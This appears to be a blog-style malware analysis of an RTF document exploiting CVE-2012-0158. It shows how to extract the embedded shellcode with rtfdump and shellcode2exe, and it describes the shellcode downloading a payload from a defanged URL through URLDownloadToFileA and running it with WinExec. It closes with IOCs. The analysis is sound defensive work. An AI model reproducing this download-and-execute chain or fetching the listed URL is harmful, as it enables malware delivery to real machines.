This is my first malware analysis writeup on payment.doc, A RTF document which has a trojan.downloader embedded in it.

File Info

File Info Payment.doc
MD5 064e82d1a926409f264a8152e315a86e
SHA1 a725f29ee627eed17ef56dca8442704e70d5adf5
SHA256 81083c18e310a1af8ae08c3e5c9eb0e1beea3cb04b2225e5f559ee4ff37e545c
File Type Rich Text Format
File Size 1.15MB
VirusTotal Link

Summary of analysis

The RTF was actually based on CVE2012-0158 a buffer overflow vulnerability in ListView/TreeView ActiveX. It is targeted at MS Office versions 2003, 2007 and 2010.

In this malware analysis, i will not be covering the buffer overflow vulnerability but extracting the embedded OLE which contains the portion of the dropper(exe).

Identification

The document was in a .doc format, but using the file command we are able to find out that the file format data is actually Rich Text Format (RTF).

Characteristics

We dump out the RTF to check that there are large numbers of groups which suggest there is obfuscation.

Focus on embedded object

We are looking for the group which has the highest level of hex characters inside. If you notice, group 165 starts with *\objdata. This word is used to embed an object in the RTF file, rather than embedding the object in group 165, the adversary added one nesting level within it. The c= tag specify how many subgroups are there. The h= tag specify how many hex characters are there.

Group 165 has 1 child nested within it, whereas group 166 has 4661 subgroups which makes it suspicious!

We can try to look into the content of the group 166 using

RTFdump.py with the command rtfdump.py payment.doc -s 166 | more

Looking at content inside we notice that the meaningful hex characters are “{0 and ..1” we will not dump the hex content out to verify our analysis.

Dumping the hex content

We dump out the content using the command. the -H specify that we are dumping out the HEX content

rtfdump.py payment.doc -s 166 -H > payment.hex

We open the hex content we are able to find out that there is indeed a suspicious URL that downloads nestom22.exe.

We now have to dump out the portion of 0xBA0 to 0xCE0 into a bin file. How did we know that we need to extract 0xBA0 to 0xCE0. If you notice that the start of the hex characters at 0xBA0 is 90 90 90 90. It means that it is a NOP infront before the shell code starts.

We now have to convert the portion of the extracted bin content into a exe using shellcode2exe.py.

Dependencies

We managed to get the following static properties of the exe after we have converted the bin into an exe.

File Info Payment.exe
MD5 D7EBBE76012C62DE6370647BF7A9DFA0
SHA1 F4887FA858B4DDFFD84C6EE1445AAEFDF38EE4E3
SHA256 F9120A485EDA066334F29C1453F7A019BE532C2D51B711DF505F877BD613AA30
File Type Executable
File Size 6.5KB
VirusTotal Link

Shellcode

We use pestudio to check that the payment.exe is indeed an executable. The first-bytes starts with MZP which we found out that it is an executable and P stands for Pascal. It is a delphi executable

Using the strings command we are able to see the URL. However strings command is not able to show clearly how does it execute. So we are going to try to run the shellcode.

We are able to execute the shellcode to see what is exactly running. We can see that the document embedded actually execute URLDownloadToFileA(hxxp://rtnlogistics.com/nestom22.exe) that stores in word.scr

The shellcode then execute WinExec(word.scr), the winexec functions enables you to execute another program while running Reference

Behavioral and code analysis findings

Running it in a debugger we are able to see that the shellcode at 0040103E has started to load MZP which is the executable starting byte.

Doing single stepping we found out at 004010CB the URLDownloadToFileA is called.

Secondary exe - nestom22.exe

We are unable to find the nestom22.exe anymore. However we are able to conclude that the RTF is a downloader that executes another executable inside.

Incident recommendation

We have identify the IOC based on the initial analysis however without the second exe we are unable to verify the exe content. However we do know that the RTF is a trojan dropper.

IOC  
URL hxxp://rtnlogistics.com/nestom22.exe
Payment.doc SHA256 81083c18e310a1af8ae08c3e5c9eb0e1beea3cb04b2225e5f559ee4ff37e545c
Payment.exe SHA256 F9120A485EDA066334F29C1453F7A019BE532C2D51B711DF505F877BD613AA30